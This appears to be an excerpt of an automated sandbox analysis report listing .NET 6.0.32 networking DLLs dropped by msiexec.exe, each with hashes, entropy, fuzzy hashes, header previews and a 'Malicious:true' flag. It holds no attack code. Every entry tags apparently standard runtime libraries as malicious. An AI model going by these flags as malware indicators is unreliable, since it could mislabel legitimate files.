                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):82208
                                                                                                                                                                                                                                        Entropy (8bit):6.572626025407632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Kkm1ufOCUCV+/pNDCJ0gRlK03B5YjbwtHUfsCN7s6+gzWWzW:Kkm1DCUCV+hND8K0R5YjbwBCx+uhq
                                                                                                                                                                                                                                        MD5:6A08AEF4C00719F2E1642A90887C9A74
                                                                                                                                                                                                                                        SHA1:52903122F8643AB7D922560223D2472F890C4B1E
                                                                                                                                                                                                                                        SHA-256:95B052CC609C7F779C4A2C30461A81175573F4CB1B49506C7C3B29DF260D6D46
                                                                                                                                                                                                                                        SHA-512:223FAAB78C2E8BB6807DE872E82BCB0624D09B1992D7B274E22BA96E66F67132AF0C6F090196B1EE51AEBA25A83DD8EB72EA6C9A87F115A3DFD61AB371FBB890
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....G@..........." .........&...............................................@............`...@......@............... .......................................*.......... )...0......(...T...............................................................H............text............................... ..`.data....".......$..................@....reloc.......0......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....D...C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .e.x.t.e.n.s.i.o.n. .m.e.t.h.o.d.s. .f.o.r. .S.y.s.t.e.m...N.e.t...H.t.t.p...H.t.t.p.C.l.i.e.n.t. .a.n.d. .S.y.s.t.e.m...N.e.t...H.t.t.p...H.t.t.p.C.o.n.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1807128
                                                                                                                                                                                                                                        Entropy (8bit):6.72398533519753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:W2yyqByNNh+gDoiXDeR57e6AnUIVWUtQ+JSy6H7BWxkUvp:WYqcNDo+DeR57e66UIVWiRa7Oh
                                                                                                                                                                                                                                        MD5:503A05E956BCEDBB5E3FF1A6DAF2EA8D
                                                                                                                                                                                                                                        SHA1:F4E123ECCE83D4CC6E69304A8FA86D32577CC903
                                                                                                                                                                                                                                        SHA-256:C528A716B9BF682A7DDC56D69A55D71CE3C73CD113814C73988E376E2FCD64C2
                                                                                                                                                                                                                                        SHA-512:86BEA623426D2E79704C801B2535A48B46F7A38C6630A6F6C5E5211E6894784ECBA504BF91504902751A062051F530B4E65CF129584C1CA36A16C7308F9B5CED
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...`............." .....^................................................................`...@......@............... ......................................\t.......j...)...`..(....u..T...............................................................H............text....].......^.................. ..`.data........p.......`..............@....reloc..(....`.......L..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):639152
                                                                                                                                                                                                                                        Entropy (8bit):6.673308999442195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:kskz/Mc4M2+yHm16kUt3p2YWjAp0FTRONXRdR9Rk3jQz9BLJq:kskH2E16KYWbIWkzjg
                                                                                                                                                                                                                                        MD5:0BD4CC6E18D3B09A80B3453BF35F36E7
                                                                                                                                                                                                                                        SHA1:7345C78FD49F71ABB6FACF5F20B65A3175459924
                                                                                                                                                                                                                                        SHA-256:EF574BE2C5237DD729950EE8817977C3160B217E27E16982AB2BDF8084DABBB6
                                                                                                                                                                                                                                        SHA-512:24C97828BF074D23124C4E34428A6E54B0E66B05EB73F4F4F28CDB1B4107716930144D3C2C2EA03190982C742989DCFE4DB2BEE65E0149E5EE519EE3E19FC759
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...q............" ......................................................................`...@......@............... ..................................,.......p;.......(...........3..T...........................................................0...H............text...>........................... ..`.data...............................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........4.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):552096
                                                                                                                                                                                                                                        Entropy (8bit):6.681059761488281
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Llpsa0qYPGZVwldB8dhpm20B2APiOLlbH5GPCWZFdYHa4s:Lli7big2joWafs
                                                                                                                                                                                                                                        MD5:2DB5CD9B802280171D198A4F374B8A3D
                                                                                                                                                                                                                                        SHA1:E16E86316C521B3E37C90FA409B9E30405CC7AAD
                                                                                                                                                                                                                                        SHA-256:42E4CAF90ADE0509F673AED417AC59900170063B2FB40F456EA910DEA16ECB7D
                                                                                                                                                                                                                                        SHA-512:861222A8BBF7A286D00CC2F99553BDE3B465789179FB1371663929B2591BB4392C73E37DBBEBFBD26B37EE27E8567ED197161DEC646B39DB8BAB1299CF0A0700
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....3..........." .........................................................`...........`...@......@............... ...........................................@...D...(...P..T...82..T...............................................................H............text...p........................... ..`.data...*z.......|..................@....reloc..T....P.......8..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101144
                                                                                                                                                                                                                                        Entropy (8bit):6.587604226793615
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rh+n8sz4LAbKisUGADWjhDC3UxyBKPGPxRI/mpiAJzSvXVdWbzk:rg84DWisUZDWj5CkxyBFfIOpiJvXVd4o
                                                                                                                                                                                                                                        MD5:50522A3577CBF4009749FFE4E12C8421
                                                                                                                                                                                                                                        SHA1:D7A60C11F73D9F5E96607FC054B0A2C21492960E
                                                                                                                                                                                                                                        SHA-256:CD22271A328C2DBEAA059E01A8323FDDD00ABF7342B17973E19F56E8A18C89D9
                                                                                                                                                                                                                                        SHA-512:7F1D35078C85FF4D72491A7817BAB435E66E0E5579B21D3FDC112405CA0D4F5BF22B3FC558D7123B526A33C2FBA2D8E9037B47AC589BFE92E6A83698EB148C25
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....8...(......................................................$.....`...@......@............... ..................................8...X2..(....b...)..........X...T...........................................................8...H............text....7.......8.................. ..`.data....#...P...$...:..............@....reloc...............^..............@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):150688
                                                                                                                                                                                                                                        Entropy (8bit):6.572736787870477
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:L9UrQQVSd8IGazZOBzjG9LysLUYxPZLVXQ2VfxynL7D+1m4aKwN4:Kr/VwpGbzSLUY5Qna1NPT
                                                                                                                                                                                                                                        MD5:E22CE550763A5E1F7B972C9587C63109
                                                                                                                                                                                                                                        SHA1:81C44FC9CF5606B5FA01C33433448899E5B928EE
                                                                                                                                                                                                                                        SHA-256:05D32CCFFF26E886B935D25F59C175641B0E99302D54214D94C13498625C195F
                                                                                                                                                                                                                                        SHA-512:DE563EC654900EB5E8D20A368E05B9382F4FE069638B9D764D0E7FA19EEC47ED23F72DE532DE2ED44AA29738206285582169A51122B5ADB6A3FD4159B939CE28
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....,;..........." .........0...............................................P............`...@......@............... ..................................P...p;.......$...(...@..h...0...T...........................................................P...H............text............................... ..`.data...L*.......,..................@....reloc..h....@....... ..............@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79008
                                                                                                                                                                                                                                        Entropy (8bit):6.583609106071422
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hd1ARHHv3bN0loUSZMg4m5DK2SvKBpK5777ZizCzX:hnWHHvr1r48DKepKtZICr
                                                                                                                                                                                                                                        MD5:DC07916645E660B316164ECE2CBB7F0A
                                                                                                                                                                                                                                        SHA1:AEC0C20BC3EF771483693302FE9E486B856DEF5D
                                                                                                                                                                                                                                        SHA-256:7E7AF8FEEC2277071F35C54A287242AB2018FC301E708F566DBFEF5CE33D62E7
                                                                                                                                                                                                                                        SHA-512:F96AB0812E712F5F104A2DF7096AEC061F7ED32B56BE4FA768F54DD97E0C1FE8F38884E4A8E9514A3E895E88B4832F9270F1AAFA9457E6098C5F1DB16AA6EFCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>..........." .........................................................0.......E....`...@......@............... .......................................,..D........(... ......@...T...............................................................H............text............................... ..`.data...............................@....reloc....... ......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):214296
                                                                                                                                                                                                                                        Entropy (8bit):6.693940725784127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c78vFw00ic76OmsmwLE3daI1h7IrHX7T1sWkN6OME/64BWm1kv2us+6M6eURojZf:IeFw0j3xbzhcB+ZfwNH6eSojCrk
                                                                                                                                                                                                                                        MD5:07A07FDE9199A72D6309494874F8A54E
                                                                                                                                                                                                                                        SHA1:89F28AF32C7E8CB5770B1AAF4DD719F537501414
                                                                                                                                                                                                                                        SHA-256:BE9DDDFB7A9D42F5161AC689A3B64D85C8E75CE74889FFC4793E95A0CE63B000
                                                                                                                                                                                                                                        SHA-512:E261EFC035F559836272B9F2131A19CB956815C99EECD85AA38A52D2352DE925E108570EA38F6DAA48F67F87921C425A3907010F5925B65908AAE09605E8A093
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....x..........." .........:...............................................@......R.....`...@......@............... .................................. ...\V..<........)...0.. ....!..T........................................................... ...H............text............................... ..`.data....3.......4..................@....reloc.. ....0......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........(.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293552
                                                                                                                                                                                                                                        Entropy (8bit):6.63463896794632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:n1azi2C1DH+sio96LEpuLdXmRw6WSLrlneg/mY:jrSK6LEpuLdmRlnjV
                                                                                                                                                                                                                                        MD5:CD1D6086F5E7A6150E11795CE3C8152E
                                                                                                                                                                                                                                        SHA1:A20C6A066729879C2FFC8AF1432CFD6528E87221
                                                                                                                                                                                                                                        SHA-256:7B7DC503E0C4308ABCE79512C8D3C68390CA70CA5D2ADA8B3DFFC55044892CDB
                                                                                                                                                                                                                                        SHA-512:ACFE41CD92B68AA5DD9ED8F7D642A7796AE2685E71EC3892F369D22C027D376C9930D56D63044CF59BB5457EF5CD4EDB3F7627FD75C5480B52D0220DA88FE4A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....5..........." .........n......................................................0M....`...@......@............... .......................................w..|....R...(...p......P&..T...............................................................H............text............................... ..`.data...Re.......f..................@....reloc.......p.......J..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):349464
                                                                                                                                                                                                                                        Entropy (8bit):6.6253757788002785
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:jWirRJNtPryZAMJU8AuxsPOWe5G8eopuFOOn5:jhR7tjyxIugMU5
                                                                                                                                                                                                                                        MD5:C534BA827DBE97B1D568A8F76D31F63F
                                                                                                                                                                                                                                        SHA1:95A39F1F53EB7EC5AD6CA825D4922C9F842776C6
                                                                                                                                                                                                                                        SHA-256:BEE41B3EC358C6AB828167EBE88EA7FAACF4834B3DF7432C92FB758B2FB7CD14
                                                                                                                                                                                                                                        SHA-512:BA2E587FC901B6340123A06DC924B33D9EAA4B1EF3B5EABC5738C08D116E1AC16943DA2F927029500E5EF44575289641C02F50F0FCF7166ADF9DA8F7AC5B4DE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..............." .........p...............................................P.......0....`...@......@............... ..........................................*...,...)...@...... ,..T...............................................................H............text..._........................... ..`.data....g.......h..................@....reloc.......@.......$..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):685344
                                                                                                                                                                                                                                        Entropy (8bit):6.824608271687778
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Mi+V+ZiHKzLkQ6kMIUMpygx3NL3dvwCvHq3L/Zg4h:MimHKz1fMOM
                                                                                                                                                                                                                                        MD5:AA0FCB794B32BBBA9813D7FEBBFD32C5
                                                                                                                                                                                                                                        SHA1:4AA0AF3D611330CB14EFC72FE803F116150820C7
                                                                                                                                                                                                                                        SHA-256:673BFFFB75840767ED7EBAB2B5DC8AD9134AE03DB4DAE13525C34AD0259FA4DE
                                                                                                                                                                                                                                        SHA-512:2628BD7D9BAB6871E1196F9B1380FC1ACD4DDE445F9EECAF7EAB7D7913EE11FCADE1BBA6741D8F7D5E939043DD36CB79112EAB70C953D579D51E34C309A0520E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....k>..........." .........................................................p............`...@......@............... ...........................................<...L.. )...`..<...(-..T...............................................................H............text.............................. ..`.data...............................@....reloc..<....`.......@..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37024
                                                                                                                                                                                                                                        Entropy (8bit):6.496750745453374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nW+mFWAN7A98x33dWh8noYSWxRyOM9P3x8rI0vKnfrjRYFSlxgdg3a2myQJN29RV:8NKyM2y37WAD9wggLsgbjWFCl7ts89zA
                                                                                                                                                                                                                                        MD5:3301E5143564ED78720D0F03612F499A
                                                                                                                                                                                                                                        SHA1:FDC810CFC491FFF116B5F37DE1BEC78EE34598F8
                                                                                                                                                                                                                                        SHA-256:15798792F8BAAB0B1BFCBD8466C791A624A1796C6A9ABDF9F60771D6094E69B4
                                                                                                                                                                                                                                        SHA-512:E6BF1D68D3CB79ACFDE091350203B27B2D8148E3369A1A382EE727210D4A3F44818022F9244218D009B01BAA63580D12C05FCCE9F3DCD3077967A606C85D500D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....\................................................................`...@......@............... ..........................................`....h...(..........H...T...............................................................H............text...KZ.......\.................. ..`.data........p.......^..............@....reloc...............f..............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...S.e.r.v.i.c.e.P.o.i.n.t...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):506528
                                                                                                                                                                                                                                        Entropy (8bit):6.740058323843262
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:TZ7w8ky6SctjxnyBDtnTDiL1h10I+nzL9wRopG+t+dRk4p7C:TZ7GyJctjxyBDhizNoA+t+dRX7C
                                                                                                                                                                                                                                        MD5:BB51E0D392A7FD7D7507CD4BC14C476D
                                                                                                                                                                                                                                        SHA1:22882A4BFF03922C5D2CC202831103AC85E8E5D9
                                                                                                                                                                                                                                        SHA-256:1BFA1A6A66D84EF5966FBA95C19BCE5E9F8D5FE51939902B9730FB5897AF125C
                                                                                                                                                                                                                                        SHA-512:EC89187EF407EBBA2A3CA5E35A746919CB8446E47F698F75514B198A5AE35ACF454A0904A45463D843D1480290E372D1D3FE2B972B421DFA420EC53C02871E1F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x............" .........~......................................................].....`...@......@............... ...................................... ....6.......(...........4..T...............................................................H............text............................... ..`.data....s...0...t..................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebClient.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):166560
                                                                                                                                                                                                                                        Entropy (8bit):6.646097951171125
                                                                                                                                                                                                                                        Encrypted:false
